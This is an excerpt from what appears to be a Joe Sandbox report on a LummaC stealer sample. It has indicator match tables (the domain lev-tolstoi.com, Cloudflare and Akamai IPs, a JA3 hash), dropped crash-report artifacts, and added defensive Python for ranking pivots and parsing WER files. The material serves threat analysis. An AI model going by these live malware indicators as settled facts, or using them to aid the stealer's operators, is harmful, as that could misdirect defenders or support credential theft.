steamcommunity.com | 8WFJ38EJo5.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 23.55.153.106
steamcommunity.com | FfcoO2Giru.exe | malicious | LummaC | 23.55.153.106
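The IP, domain and ASN match tables in this section are pivot material: the same LummaC samples recur across them, but not every shared indicator is worth blocking or hunting on. The script below is an added example, not Joe Sandbox code. Its MATCHES list is transcribed from the match tables here (SHA-256 values are not present in the extracted text, so samples are keyed by file name); REPORT_FAMILY, SHARED_HOSTING and FAMILY_ALIASES are assumptions of the example, not report fields. It credits each IP with the samples that contacted it according to the Context column of the domain and ASN rows, then ranks indicators by how many distinct samples share them and marks as low fidelity any indicator that sits on shared hosting or is also used by samples of an unrelated family.

```python
"""Pivot ranking over the IP, domain and ASN 'Matches' tables of this report.

Added example, not part of the Joe Sandbox report. MATCHES is transcribed from
the match tables in this section; REPORT_FAMILY, SHARED_HOSTING and
FAMILY_ALIASES are assumptions of the example.
"""
from __future__ import annotations

import ipaddress
from collections import defaultdict
from dataclasses import dataclass

REPORT_FAMILY = "LummaC"  # family this report attributes to 5Z19n7XRT1.exe
# Assumption: infrastructure shared by many unrelated tenants is a weak pivot.
SHARED_HOSTING = {"CLOUDFLARENETUS", "AKAMAI-ASN1EU", "steamcommunity.com"}
FAMILY_ALIASES = {"LummaC Stealer": "LummaC"}  # the report uses both spellings


@dataclass(frozen=True)
class Match:
    kind: str          # "ip", "domain" or "asn"
    indicator: str     # Match column
    sample: str        # Associated Sample Name column
    threat: str        # Threat Name column, comma-separated when several
    context: str = ""  # Context column: URL for IP rows, contacted IP for domain/ASN rows


# Sample names as they appear in the tables above (constructed from the page).
LUMMA_CF = ["TdloJt4gY3.exe", "726odELDs8.exe", "Tqa1vDp9NT.exe", "YrWaRb0IKJ.exe",
            "FfcoO2Giru.exe", "k7T6akLcAr.exe", "hx0wBsOjkQ.exe", "fnnGMmd8eJ.exe", "IzDjbVdHha.exe"]
LUMMA_AK = ["TdloJt4gY3.exe", "3LUyRfIoKs.exe", "726odELDs8.exe", "Tqa1vDp9NT.exe",
            "YrWaRb0IKJ.exe", "2S6U7zz1Jg.exe", "v5Evrl41VR.exe", "H1iOI9vWfh.exe", "FfcoO2Giru.exe"]
MULTI = ("8WFJ38EJo5.exe", "LummaC, Amadey, LummaC Stealer, Stealc, Vidar")
LEV_TOLSTOI = {"TdloJt4gY3.exe": "172.67.157.254", "3LUyRfIoKs.exe": "104.21.66.86",
               "726odELDs8.exe": "172.67.157.254", "Tqa1vDp9NT.exe": "172.67.157.254",
               "YrWaRb0IKJ.exe": "172.67.157.254", "v5Evrl41VR.exe": "104.21.66.86",
               "H1iOI9vWfh.exe": "104.21.66.86", MULTI[0]: "104.21.66.86",
               "FfcoO2Giru.exe": "172.67.157.254", "k7T6akLcAr.exe": "172.67.157.254"}

MATCHES = [
    Match("ip", "104.21.66.86", "MV ROCKET_PDA.exe", "FormBook",
          "www.ayushigangwar.com/nqn4/?CJBlp=0Brh6Vr8UbBX&T2MpwT=59bmqUDXor7TXV4b71NCQ0d0nCVif23i1yH5+9ZmJc5hgCU7y+ZN9z0btTsWzGv6OrGw"),
    *[Match("ip", "172.67.157.254", s, "LummaC") for s in LUMMA_CF],
    Match("ip", "172.67.157.254", "T4qO1i2Jav.exe", "LummaC Stealer"),
    *[Match("ip", "23.55.153.106", s, "LummaC") for s in LUMMA_AK],
    Match("ip", "23.55.153.106", *MULTI),
    *[Match("domain", "lev-tolstoi.com", s, MULTI[1] if s == MULTI[0] else "LummaC", ip)
      for s, ip in LEV_TOLSTOI.items()],
    *[Match("domain", "steamcommunity.com", s, "LummaC", "23.55.153.106") for s in LUMMA_AK],
    Match("domain", "steamcommunity.com", *MULTI, "23.55.153.106"),
    *[Match("asn", "AKAMAI-ASN1EU", s, "LummaC", "23.55.153.106") for s in LUMMA_AK],
    Match("asn", "AKAMAI-ASN1EU", *MULTI, "23.55.153.106"),
    Match("asn", "CLOUDFLARENETUS", "TdloJt4gY3.exe", "LummaC", "172.67.157.254"),
    Match("asn", "CLOUDFLARENETUS", "3LUyRfIoKs.exe", "LummaC", "104.21.66.86"),
    Match("asn", "CLOUDFLARENETUS", "726odELDs8.exe", "LummaC", "172.67.157.254"),
    Match("asn", "CLOUDFLARENETUS", "Tqa1vDp9NT.exe", "LummaC"),  # Context cut off in the extract
]


def families(threat: str) -> set:
    """Split a Threat Name cell into normalised family names."""
    return {FAMILY_ALIASES.get(t.strip(), t.strip()) for t in threat.split(",")}


def is_ip(value: str) -> bool:
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False


def with_context_evidence(matches: list) -> list:
    # Domain/ASN rows name the IP the sample contacted; credit that IP with the sample too.
    extra = [Match("ip", m.context, m.sample, m.threat)
             for m in matches if m.kind in ("domain", "asn") and is_ip(m.context)]
    return list(matches) + extra


def domain_to_ips(matches: list) -> dict:
    """Which IPs each matched domain resolved to, per the Context column."""
    out = defaultdict(set)
    for m in matches:
        if m.kind == "domain" and is_ip(m.context):
            out[m.indicator].add(m.context)
    return dict(out)


def ip_to_asn(matches: list) -> dict:
    """IP -> ASN, recovered from the Context column of the ASN rows."""
    return {m.context: m.indicator for m in matches if m.kind == "asn" and is_ip(m.context)}


def rank_pivots(matches: list) -> list:
    """One row per indicator: distinct samples, samples of other families, fidelity.
    Low fidelity: the indicator (or its ASN) is shared hosting, or unrelated families use it."""
    seen = defaultdict(dict)  # (kind, indicator) -> {sample: families}
    for m in with_context_evidence(matches):
        seen[(m.kind, m.indicator)].setdefault(m.sample, set()).update(families(m.threat))
    asn_of = ip_to_asn(matches)
    rows = []
    for (kind, ind), samples in seen.items():
        unrelated = sorted(s for s, fams in samples.items() if REPORT_FAMILY not in fams)
        shared = ind in SHARED_HOSTING or asn_of.get(ind) in SHARED_HOSTING
        rows.append({"kind": kind, "indicator": ind, "samples": len(samples),
                     "unrelated": unrelated, "fidelity": "low" if shared or unrelated else "high"})
    return sorted(rows, key=lambda r: (r["fidelity"] != "high", -r["samples"], r["indicator"]))


if __name__ == "__main__":
    for r in rank_pivots(MATCHES):
        print(f'{r["fidelity"]:4} {r["kind"]:6} {r["indicator"]:20} samples={r["samples"]:2} '
              f'unrelated={",".join(r["unrelated"]) or "-"}')
    print("lev-tolstoi.com resolved to:", sorted(domain_to_ips(MATCHES)["lev-tolstoi.com"]))
```

On this data the only high-fidelity pivot is lev-tolstoi.com: it is used by ten LummaC samples and by nothing else, and it resolved to both Cloudflare addresses, so the domain is stable while the IPs behind it move. 104.21.66.86 is the counterexample: it also fronts an unrelated FormBook site, so the IP alone would produce false positives. steamcommunity.com and 23.55.153.106 (AKAMAI-ASN1EU) are shared by every LummaC sample in the tables but belong to legitimate infrastructure, which is why the example demotes them.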
                                                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                        AKAMAI-ASN1EUTdloJt4gY3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        3LUyRfIoKs.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        726odELDs8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        Tqa1vDp9NT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        YrWaRb0IKJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        2S6U7zz1Jg.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        v5Evrl41VR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        H1iOI9vWfh.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        8WFJ38EJo5.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        FfcoO2Giru.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
CLOUDFLARENETUS
  TdloJt4gY3.exe | malicious | LummaC | 172.67.157.254
  3LUyRfIoKs.exe | malicious | LummaC | 104.21.66.86
  726odELDs8.exe | malicious | LummaC | 172.67.157.254
  Tqa1vDp9NT.exe | malicious | LummaC | 172.67.157.254
  YrWaRb0IKJ.exe | malicious | LummaC | 172.67.157.254
  v5Evrl41VR.exe | malicious | LummaC | 104.21.66.86
  H1iOI9vWfh.exe | malicious | LummaC | 104.21.66.86
  8WFJ38EJo5.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 104.21.66.86
  FfcoO2Giru.exe | malicious | LummaC | 172.67.157.254
  FLKCAS1DzH.bat | malicious | Unknown | 172.64.41.3
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 (JA3 fingerprint)
  TdloJt4gY3.exe | malicious | LummaC | 104.21.66.86, 172.67.157.254, 23.55.153.106
  3LUyRfIoKs.exe | malicious | LummaC | 104.21.66.86, 172.67.157.254, 23.55.153.106
  726odELDs8.exe | malicious | LummaC | 104.21.66.86, 172.67.157.254, 23.55.153.106
  Tqa1vDp9NT.exe | malicious | LummaC | 104.21.66.86, 172.67.157.254, 23.55.153.106
  YrWaRb0IKJ.exe | malicious | LummaC | 104.21.66.86, 172.67.157.254, 23.55.153.106
  2S6U7zz1Jg.exe | malicious | LummaC | 104.21.66.86, 172.67.157.254, 23.55.153.106
  v5Evrl41VR.exe | malicious | LummaC | 104.21.66.86, 172.67.157.254, 23.55.153.106
  H1iOI9vWfh.exe | malicious | LummaC | 104.21.66.86, 172.67.157.254, 23.55.153.106
  8WFJ38EJo5.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 104.21.66.86, 172.67.157.254, 23.55.153.106
  FfcoO2Giru.exe | malicious | LummaC | 104.21.66.86, 172.67.157.254, 23.55.153.106
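The ASN and fingerprint context above lists other samples that contacted the same addresses, and a practitioner should weigh that before pivoting on it: 104.21.66.86, 172.67.157.254 and 172.64.41.3 are Cloudflare edge addresses fronting a very large number of unrelated sites, 23.55.153.106 sits on an Akamai range, and a0e9f5d64349fb13191bc781f81f42e1 is the JA3 hash the native Windows TLS stack (schannel) produces, so it matches most Windows software rather than LummaC specifically. The Python below is an added example, not part of the Joe Sandbox report: it re-reads the rows above (transcribed here as constructed input), aggregates the overlap per IP and ranks the pivots so that any address not on a shared CDN edge comes first. The Cloudflare prefixes are taken from Cloudflare's published IPv4 list (only the two touched by this report are included); the Akamai prefix 23.32.0.0/11 is an assumption from public allocation data and is not stated on this page.

```python
"""Rank the infrastructure overlaps from a sandbox context table and flag
which of them are actually usable pivots (added example, not report code)."""
from collections import defaultdict
from ipaddress import ip_address, ip_network

# Constructed from the context rows on this page: (sample, threat names, contacted IPs).
CONTEXT_ROWS = [
    ("TdloJt4gY3.exe", ["LummaC"], ["104.21.66.86", "172.67.157.254", "23.55.153.106"]),
    ("3LUyRfIoKs.exe", ["LummaC"], ["104.21.66.86", "172.67.157.254", "23.55.153.106"]),
    ("726odELDs8.exe", ["LummaC"], ["104.21.66.86", "172.67.157.254", "23.55.153.106"]),
    ("Tqa1vDp9NT.exe", ["LummaC"], ["104.21.66.86", "172.67.157.254", "23.55.153.106"]),
    ("YrWaRb0IKJ.exe", ["LummaC"], ["104.21.66.86", "172.67.157.254", "23.55.153.106"]),
    ("2S6U7zz1Jg.exe", ["LummaC"], ["104.21.66.86", "172.67.157.254", "23.55.153.106"]),
    ("v5Evrl41VR.exe", ["LummaC"], ["104.21.66.86", "172.67.157.254", "23.55.153.106"]),
    ("H1iOI9vWfh.exe", ["LummaC"], ["104.21.66.86", "172.67.157.254", "23.55.153.106"]),
    ("8WFJ38EJo5.exe", ["LummaC", "Amadey", "LummaC Stealer", "Stealc", "Vidar"],
     ["104.21.66.86", "172.67.157.254", "23.55.153.106"]),
    ("FfcoO2Giru.exe", ["LummaC"], ["104.21.66.86", "172.67.157.254", "23.55.153.106"]),
    ("FLKCAS1DzH.bat", ["Unknown"], ["172.64.41.3"]),
]

# Shared CDN edge ranges. The Cloudflare prefixes come from Cloudflare's published
# IPv4 list (only the two this report touches); the Akamai prefix is an assumption
# from public allocation data and is not stated on the report page.
SHARED_EDGE_RANGES = {
    "Cloudflare": [ip_network("104.16.0.0/13"), ip_network("172.64.0.0/13")],
    "Akamai": [ip_network("23.32.0.0/11")],
}


def shared_edge_owner(ip: str):
    """Name of the CDN whose shared edge range contains ip, or None."""
    addr = ip_address(ip)
    for owner, nets in SHARED_EDGE_RANGES.items():
        if any(addr in net for net in nets):
            return owner
    return None


def overlaps(rows):
    """Map each contacted IP to the set of samples that reached it."""
    by_ip = defaultdict(set)
    for sample, _threats, ips in rows:
        for ip in ips:
            by_ip[ip].add(sample)
    return by_ip


def rank_pivots(rows):
    """Return (ip, sample_count, edge_owner) tuples, strongest pivot first.
    An address not on a shared edge outranks any CDN edge regardless of how
    many samples overlap on it; ties are broken by overlap count, then IP."""
    ranked = [(ip, len(samples), shared_edge_owner(ip))
              for ip, samples in overlaps(rows).items()]
    ranked.sort(key=lambda t: (t[2] is not None, -t[1], t[0]))
    return ranked


def strong_pivots(rows):
    """IPs worth pivoting on: those that are not shared CDN edges."""
    return [ip for ip, _n, owner in rank_pivots(rows) if owner is None]


if __name__ == "__main__":
    for ip, n, owner in rank_pivots(CONTEXT_ROWS):
        print(f"{ip:16} {n:2} samples  {'shared edge: ' + owner if owner else 'dedicated'}")
    print("strong pivots:", strong_pivots(CONTEXT_ROWS) or "none")
```

For this report every overlapping address is a shared edge, so the table is evidence that LummaC samples use Cloudflare-fronted C2, not an indicator to block or hunt on; the domains behind those edges (from the malware configuration section) are the pivot to use.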
No context
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):65536
Entropy (8bit):1.0599118016320659
Encrypted:false
SSDEEP:192:xuwY5Wu0pluKQju3mFizuiFiZ24IO8bx:xw5UpluKQjLizuiFiY4IO8b
MD5:65FC3798FDB7DBC085E083B39815D72E
SHA1:A51361ED5C45FC2741F141A7B8EFD57DB7A68D3C
SHA-256:A9A40F3AFA7ED3BA5656B7BE606D8D4D58E141BB6492CBAE8C44584D2A69DF5D
SHA-512:850F19C626931221FD8AE31AD49995BC2C9EC683CC7A535ADEA771069B6D88A89D408E8C6BB1C514AEF6DA6BF3672AF2ED10E8AF007C9363846CE00DE2721E1B
Malicious:true
Reputation:low
Preview (UTF-16LE decoded; truncated as in the sandbox output):
  Version=1
  EventType=APPCRASH
  EventTime=133798499499261131
  ReportType=2
  Consent=1
  UploadTime=133798499510667346
  ReportStatus=524384
  ReportIdentifier=549f35ac-3fe3-4aaa-9093-9863e73eb5c1
  IntegratorReportIdentifier=48a7ded2-66bc-4e92-b1be-0d7abed1752f
  Wow64Host=34404
  Wow64Guest=332
  NsAppName=5Z19n7XRT1.exe
  AppSessionGuid=00000dc4-0001-0015-f15e-8fb60659db01
  TargetAppId=W:00063340a507512d6062507e8882feeb8acd0000ffff!0000056d8ee3e8a88bec928c8cd56efe606400262ffb!5Z19n7XRT1.exe
  TargetApp
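The Report.wer above is Key=Value text in UTF-16LE with a BOM, and its TargetAppId field carries the SHA-1 of the binary that crashed (the 40 hex characters after the "!0000" prefix), which here equals the SHA-1 of the analysed sample; Wow64Host=34404 (0x8664, AMD64) and Wow64Guest=332 (0x14c, I386) say a 32-bit image crashed on a 64-bit host, consistent with the SysWOW64\WerFault.exe writer. On a real host the same file is written under C:\ProgramData\Microsoft\Windows\WER\ReportQueue (or ReportArchive, or the per-user %LOCALAPPDATA%\Microsoft\Windows\WER), so a crash report can prove the stealer ran even after the executable has been deleted. The Python below is an added example, not part of the Joe Sandbox report: it decodes the file honouring the BOM, converts the FILETIME timestamps to UTC, extracts the crashed binary's name and SHA-1 from TargetAppId and checks them against the sample hash. The input bytes are constructed from the fields shown in the preview above; the machine-type constants are the standard PE values.

```python
"""Parse a Windows Error Reporting Report.wer file and identify the crashed
binary so it can be matched against a known sample (added example, not report code).

Report.wer is UTF-16LE text with a BOM, CRLF line endings and Key=Value lines.
TargetAppId has the form  W:<AppId>!0000<SHA-1 of the executable>!<file name>.
"""
import re
from datetime import datetime, timedelta, timezone

# Constructed input: the Report.wer fields shown in the sandbox preview,
# re-encoded the way WerFault.exe writes them (BOM + UTF-16LE + CRLF).
_WER_TEXT = (
    "Version=1\r\n"
    "EventType=APPCRASH\r\n"
    "EventTime=133798499499261131\r\n"
    "ReportType=2\r\n"
    "Consent=1\r\n"
    "UploadTime=133798499510667346\r\n"
    "ReportStatus=524384\r\n"
    "ReportIdentifier=549f35ac-3fe3-4aaa-9093-9863e73eb5c1\r\n"
    "IntegratorReportIdentifier=48a7ded2-66bc-4e92-b1be-0d7abed1752f\r\n"
    "Wow64Host=34404\r\n"
    "Wow64Guest=332\r\n"
    "NsAppName=5Z19n7XRT1.exe\r\n"
    "AppSessionGuid=00000dc4-0001-0015-f15e-8fb60659db01\r\n"
    "TargetAppId=W:00063340a507512d6062507e8882feeb8acd0000ffff"
    "!0000056d8ee3e8a88bec928c8cd56efe606400262ffb!5Z19n7XRT1.exe\r\n"
)
SAMPLE_WER = b"\xff\xfe" + _WER_TEXT.encode("utf-16-le")

# SHA-1 of the analysed sample, from the report header.
SAMPLE_SHA1 = "056d8ee3e8a88bec928c8cd56efe606400262ffb"

_FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
_TARGET_RE = re.compile(
    r"^W:(?P<appid>[0-9a-f]+)!0000(?P<sha1>[0-9a-f]{40})!(?P<name>.+)$", re.I)
_IMAGE_FILE_MACHINE_I386 = 0x14C   # 332


def parse_wer(data: bytes) -> dict:
    """Decode a Report.wer blob into a {key: value} dict, honouring the BOM."""
    if data.startswith(b"\xff\xfe"):
        text = data[2:].decode("utf-16-le")
    elif data.startswith(b"\xfe\xff"):
        text = data[2:].decode("utf-16-be")
    else:  # WER always writes a BOM, but be tolerant of stripped copies
        text = data.decode("utf-16-le", errors="replace")
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition("=")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def filetime_to_utc(value: str) -> datetime:
    """EventTime/UploadTime are FILETIME: 100 ns ticks since 1601-01-01 UTC."""
    return _FILETIME_EPOCH + timedelta(microseconds=int(value) // 10)


def crashed_binary(fields: dict):
    """Return (file name, sha1) from TargetAppId, or None if absent or malformed."""
    m = _TARGET_RE.match(fields.get("TargetAppId", ""))
    if not m:
        return None
    return m.group("name"), m.group("sha1").lower()


def triage(data: bytes, known_sha1: str) -> dict:
    """Summarise a Report.wer and say whether the crashed binary is the known sample."""
    fields = parse_wer(data)
    ident = crashed_binary(fields)
    return {
        "event": fields.get("EventType"),
        "when": filetime_to_utc(fields["EventTime"]) if "EventTime" in fields else None,
        "app": fields.get("NsAppName"),
        "sha1": ident[1] if ident else None,
        "matches_sample": bool(ident) and ident[1] == known_sha1.lower(),
        "wow64": fields.get("Wow64Guest") == str(_IMAGE_FILE_MACHINE_I386),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_WER, SAMPLE_SHA1).items():
        print(f"{key:15} {value}")
```

The SHA-1 in TargetAppId is computed by WER over the image on disk at crash time, so it is the value to compare against sandbox and threat-intelligence hashes; NsAppName alone is not reliable, since the sample was renamed before analysis.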
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):8362
Entropy (8bit):3.7020569240998515
Encrypted:false
SSDEEP:192:R6l7wVeJAl6Im6Y2D+SUNLgmfWKnvrppDy89bydsf5mm:R6lXJK6Im6YTSUNLgmf9nvr3yWfh
MD5:40EC0D7F44B488FACCEA90EC728810B1
SHA1:740BDFA553B2CF57F747A0D006825DC27EC16A01
SHA-256:579E3F04026495E58A8A2CA6B5AA067DD08A20DEE164AE7130E0F18248813F90
SHA-512:A1340D29E263405D1DDBDA1963FF0D6B990535F212B4B3FE0603DE830156C3E9878B7B7A29F62E9E33D49E035D248BAED72D3C99DD83BDFC7A310FC761180778
Malicious:false
Reputation:low
Preview (UTF-16LE decoded; truncated as in the sandbox output):
  <?xml version="1.0" encoding="UTF-16"?>
  <WERReportMetadata>
    <OSVersionInformation>
      <WindowsNTVersion>10.0</WindowsNTVersion>
      <Build>19045</Build>
      <Product>(0x30): Windows 10 Pro</Product>
      <Edition>Professional</Edition>
      <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>
      <Revision>2006</Revision>
      <Flavor>Multiprocessor Free</Flavor>
      <Architecture>X64</Architecture>
      <LCID>2057</LCID>
    </OSVersionInformation>
    <ProcessInformation>
      <Pid>3524</Pi
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):4623
                                                                                                                                                                                                                                                                        Entropy (8bit):4.498568341186277
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:cvIwWl8zsUJg77aI9qFWpW8VYl3Ym8M4Jr90OqFLu4+q8HJ2OSgT9HzY9d:uIjfSI7I07V9JCHH7dgxzY9d
                                                                                                                                                                                                                                                                        MD5:9CA45CAD9C6BB87B47ACFF2516A00A61
                                                                                                                                                                                                                                                                        SHA1:22DCECF236D3219912E52EF56B12A710C103E6CB
                                                                                                                                                                                                                                                                        SHA-256:36742F9F8EF1DB8AE6363C0403E695881DAA160637AD0510355CB1A2E105E8ED
                                                                                                                                                                                                                                                                        SHA-512:39B59A4F87C9150C523D34E8CAF6EC9CFA9B4F6DC0559D8C7A10A31841F4891D9834738AC8D973DC8A8341C7FB455E0ECE2F0810D79DAF8C8412A6BB98643E76
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="650881" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        File Type:Mini DuMP crash report, 15 streams, Sat Dec 28 08:59:10 2024, 0x1205a4 type
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):108878
                                                                                                                                                                                                                                                                        Entropy (8bit):2.1818312349839863
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:768:zfN4lYvSTBSojmFxb5/jctCyt2KwQzVZTYXK:TAYvpo6Fh5/jXygHQ5ZTYXK
                                                                                                                                                                                                                                                                        MD5:DF3976A3CDAC94CEBA4D754ED21D6E8D
                                                                                                                                                                                                                                                                        SHA1:1094F35DBCDDF6B4DBED26247FDA8AB726487E60
                                                                                                                                                                                                                                                                        SHA-256:3BDA3254933882E507BBF152F650BE4FF8375FDA8FC69655E0AA952919C509C8
                                                                                                                                                                                                                                                                        SHA-512:6984B2C62C0CBE23FF4DEC612681992DB92C9A63D6EFEFD2AE31F80EBF20688E8528ED56BACF1F3FE04A2F743C1B1408063CFDA87E288695D7B83656791B791C
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:MDMP..a..... ........og........................p...........\...h$......D....Q..........`.......8...........T............G..Nb...........%...........'..............................................................................eJ......H(......GenuineIntel............T............og.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1835008
                                                                                                                                                                                                                                                                        Entropy (8bit):4.468599018724792
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:LzZfpi6ceLPx9skLmb0f5ZWSP3aJG8nAgeiJRMMhA2zX4WABluuNOjDH5S:nZHt5ZWOKnMM6bFpQj4
                                                                                                                                                                                                                                                                        MD5:78F4E5876ADE42D5752260ACA6285050
                                                                                                                                                                                                                                                                        SHA1:96CA07E3A41D1FF38D000D44213AD25C48A3F65C
                                                                                                                                                                                                                                                                        SHA-256:F9DF3E34BE0A180F790634A3719CC1FF89064C0EBF62DF797BD74498A22FB190
                                                                                                                                                                                                                                                                        SHA-512:D7A6E8B821677C799B2BB273858FA485D80134A0DAC86BF776A3FAE8DD27CFA063DB5536EBC8370BAC7AF26D8F6B94FB03095D9F773700A1CBD73029EF49CC8A
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.....Y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Entropy (8bit):6.420287070581007
                                                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                        File name:5Z19n7XRT1.exe
                                                                                                                                                                                                                                                                        File size:375'296 bytes
                                                                                                                                                                                                                                                                        MD5:fb4f1803fbfc70bc55b61bf418d52d3d
                                                                                                                                                                                                                                                                        SHA1:056d8ee3e8a88bec928c8cd56efe606400262ffb
                                                                                                                                                                                                                                                                        SHA256:dcb4c992866efa672aa8b755cb1496eff39fc6c504c88eee5525c0a46bee1c9e
                                                                                                                                                                                                                                                                        SHA512:879da76167f90d907dbd24dab6fddea405e8ba165c06327546df342bbbf3d6f0682714fc5143d51a547450482cc9d5c6caab70aff1c209a388d4a0dfc24c0f81
                                                                                                                                                                                                                                                                        SSDEEP:6144:xl+TwMYCL9x8QRexzbzPncrU5gNw35pqvkV+05c:xAUnvdzXdbMvG+05c
                                                                                                                                                                                                                                                                        TLSH:9B84BE5179F29026FFFB8B305570D6A4597BBC63AA70808F32D0366E1E336918A61733
                                                                                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......).`.mq..mq..mq...>..oq..s#..sq..s#..yq..s#...q..J.u.jq..mq...q..s#..lq..s#..lq..s#..lq..Richmq..................PE..L....|Yf...
                                                                                                                                                                                                                                                                        Icon Hash:8f97312d3525191a
                                                                                                                                                                                                                                                                        Entrypoint:0x401453
                                                                                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                        Time Stamp:0x66597CFC [Fri May 31 07:32:12 2024 UTC]
                                                                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                                                                        OS Version Major:5
                                                                                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                                                                                        File Version Major:5
                                                                                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                                                                                        Subsystem Version Major:5
                                                                                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                                                                                        Import Hash:9662782e6e9e28f2f28849063179bc57
                                                                                                                                                                                                                                                                        Instruction
